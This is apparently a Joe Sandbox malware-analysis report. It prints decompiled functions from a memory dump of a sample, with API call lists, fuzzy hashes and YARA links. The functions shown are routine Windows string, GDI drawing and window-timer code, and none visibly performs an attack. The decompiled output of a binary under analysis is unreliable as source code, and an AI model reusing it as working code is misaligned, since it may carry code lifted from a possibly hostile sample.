								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x43a068 = 2;
							goto L5;
						}
					} else {
						 *0x43a068 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02180E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02180E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
GetCPInfo.KERNEL32(0000000B,00000000,00000000,02180E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x42f5d0);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x439ee0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040BFEE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x439ee0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x439efc; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x439ee0 = 2;
							goto L5;
						}
					} else {
						 *0x439ee0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404577, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404581
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404596
SelectObject.GDI32(?,?), ref: 004045A7
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004045CE
StretchBlt.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00404637
BitBlt.GDI32(00000000,?,?,?,?,?,?,00000000,00CC0020), ref: 00404682
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004046BE
DeleteObject.GDI32(?), ref: 004046C8
DeleteDC.GDI32(?), ref: 004046D2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction ID: a75907197356ce4ca66e83fb1b854f5ba4b4597ff605ca05275262f1e745a3b8
Opcode Fuzzy Hash: 5cd169734f3d4076a8351419a8053b8a42ab7ab7df8d0770ac810dba87890358
Instruction Fuzzy Hash: 7F51A5B6600109AFCB04CF98DD95EEE77B9FF8C348F118258FA09A7254D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404816, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404816(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24 + _a32 - (_v12 + 1) * _a40, _a28, (_v12 + 1) * _a40, _v8, 0, _a32 - (_v12 + 1) * _a40, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404820
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00404835
SelectObject.GDI32(?,?), ref: 00404846
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040486D
StretchBlt.GDI32(?,00000000,?,?,?,00000000,?,?,?,?,00CC0020), ref: 004048D6
BitBlt.GDI32(?,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00404921
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 0040495D
DeleteObject.GDI32(?), ref: 00404967
DeleteDC.GDI32(?), ref: 00404971

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction ID: 1794ec46a4d52dcc5cb24ae7db09ad2764e7e5e2d0b87eeeb5bcffab36add2c1
Opcode Fuzzy Hash: cb5311c6d517274d3363f8e51808646c66a29d66cd1ded68f5bbd400a57f7aa2
Instruction Fuzzy Hash: 375198B6600109AFCB04CF98D995EEE77B9FF8C344F158258FA09A7254C635ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E758, Relevance: 13.6, APIs: 9, Instructions: 127
timekeyboardCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0041E758(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t83;
				struct HWND__* _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t88;

				_t87 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					L31:
					return _t42;
				}
				_t83 = E004249C4();
				_v12 = _t83;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t87 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t87 + 0x64))(_v20.x, _v20.y, 0, _t82);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t83 + 0x104) =  *(_t83 + 0x104) | 0xffffffff;
					L16:
					if(_v8 < 0) {
						L25:
						if( *(_v12 + 0x104) == 0xffffffff) {
							KillTimer( *(_t87 + 0x1c), 0xe001);
						}
						 *((intOrPtr*)( *_t87 + 0xdc))(0xffffffff);
						L28:
						_t42 = 0xe000;
						if(_a4 != 0xe000) {
							goto L31;
						}
						_t42 = KillTimer( *(_t87 + 0x1c), 0xe000);
						if(_v8 < 0) {
							goto L31;
						}
						return  *((intOrPtr*)( *_t87 + 0xdc))(_v8);
					}
					ClientToScreen( *(_t87 + 0x1c),  &_v20);
					_push(_v20.y);
					_t85 = WindowFromPoint(_v20);
					if(_t85 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x104) =  *(_v12 + 0x104) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							goto L28;
						}
						goto L25;
					}
					_t60 =  *(_t87 + 0x1c);
					if(_t85 == _t60 || IsChild(_t60, _t85) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0xcc));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t85) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
				_t72 = E00414CEF(_t87);
				if(E00414D5B(_t87) == 0 || E004166B3(_t72) == 0) {
					_v8 = _v8 | 0xffffffff;
				}
				_t66 =  *((intOrPtr*)(_t83 + 0xcc));
				if(_t66 != 0) {
					_t86 =  *((intOrPtr*)(_t66 + 0x1c));
				} else {
					_t86 = 0;
				}
				_t68 = E00413740(_t88, GetCapture());
				if(_t68 != _t87) {
					if(_t68 != 0) {
						_t81 =  *((intOrPtr*)(_t68 + 0x1c));
					} else {
						_t81 = 0;
					}
					if(_t81 != _t86 && E00414CEF(_t68) == _t72) {
						_v8 = _v8 | 0xffffffff;
					}
				}
				goto L16;
			}

APIs

GetKeyState.USER32(00000001), ref: 0041E764
GetCursorPos.USER32(?), ref: 0041E782
ScreenToClient.USER32 ref: 0041E78F
GetCapture.USER32 ref: 0041E7DF

Part of subcall function 004166B3: IsWindowEnabled.USER32(?), ref: 004166BD

ClientToScreen.USER32(?,?), ref: 0041E829
WindowFromPoint.USER32(?,?), ref: 0041E835
IsChild.USER32(?,00000000), ref: 0041E84A
KillTimer.USER32(?,0000E001), ref: 0041E890
KillTimer.USER32(?,0000E000), ref: 0041E8AD

Part of subcall function 00414D5B: GetForegroundWindow.USER32(00000000,?,0041E7BB), ref: 00414D5F
Part of subcall function 00414D5B: GetLastActivePopup.USER32(?), ref: 00414D77

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
String ID:
API String ID: 1383385731-0
Opcode ID: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction ID: 60a7b001f52f4571865f2cd2d5ebedbd3e454d14a8c641626661d3e0f237eb6f
Opcode Fuzzy Hash: 44edb78afc276ab783549d9561dc10d3387f8a1e8d9759539a985f87b51eceed
Instruction Fuzzy Hash: 4D416334B00605DFDB20AF66CC44AEE7BB5EF44714F20866AE861D72E1D738DD819B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040443F, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404449
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
SelectObject.GDI32(?,?), ref: 0040446F
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
DeleteObject.GDI32(?), ref: 00404561
DeleteDC.GDI32(?), ref: 0040456B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004046DE, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 004046E8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
SelectObject.GDI32(?,?), ref: 0040470E
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
DeleteObject.GDI32(?), ref: 00404800
DeleteDC.GDI32(?), ref: 0040480A

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00412121, Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412121(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t44;
				signed int _t48;
				signed char _t53;
				struct HWND__* _t55;
				struct HINSTANCE__* _t60;
				void* _t62;
				void* _t73;
				intOrPtr* _t77;
				void* _t79;
				void* _t81;

				E00406520(E00429CE8, _t79);
				_t77 = __ecx;
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
				_t73 =  *(__ecx + 0x44);
				 *(_t79 - 0x18) =  *(__ecx + 0x48);
				_t40 = E00424BFB();
				_t60 =  *(_t40 + 0xc);
				if( *(_t77 + 0x40) != 0) {
					_t60 =  *(E00424BFB() + 0xc);
					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
					_t73 = _t40;
				}
				if(_t73 != 0) {
					_t40 = LockResource(_t73);
					 *(_t79 - 0x18) = _t40;
				}
				if( *(_t79 - 0x18) != 0) {
					 *(_t79 - 0x14) = E004120A5(_t77);
					E00413C3E();
					__eflags =  *(_t79 - 0x14);
					 *(_t79 - 0x20) = 0;
					if( *(_t79 - 0x14) != 0) {
						_t55 = IsWindowEnabled( *(_t79 - 0x14));
						__eflags = _t55;
						if(_t55 != 0) {
							EnableWindow( *(_t79 - 0x14), 0);
							 *(_t79 - 0x20) = 1;
						}
					}
					_push(_t77);
					 *(_t79 - 4) = 0;
					"VWh\rDB"();
					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
					__eflags = _t44;
					if(_t44 != 0) {
						__eflags =  *(_t77 + 0x24) & 0x00000010;
						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
							_t62 = 4;
							_t53 = E00416528(_t77);
							__eflags = _t53 & 0x00000001;
							if((_t53 & 0x00000001) != 0) {
								_t62 = 5;
							}
							_push(_t62);
							E00415F1B(_t77);
						}
						__eflags =  *(_t77 + 0x1c);
						if( *(_t77 + 0x1c) != 0) {
							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					__eflags =  *(_t79 - 0x20);
					if( *(_t79 - 0x20) != 0) {
						EnableWindow( *(_t79 - 0x14), 1);
					}
					__eflags =  *(_t79 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t79 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t77 + 0x58))();
					E004120DF(_t77, _t77, __eflags);
					_t48 =  *(_t77 + 0x2c);
				} else {
					_t48 = _t40 | 0xffffffff;
				}
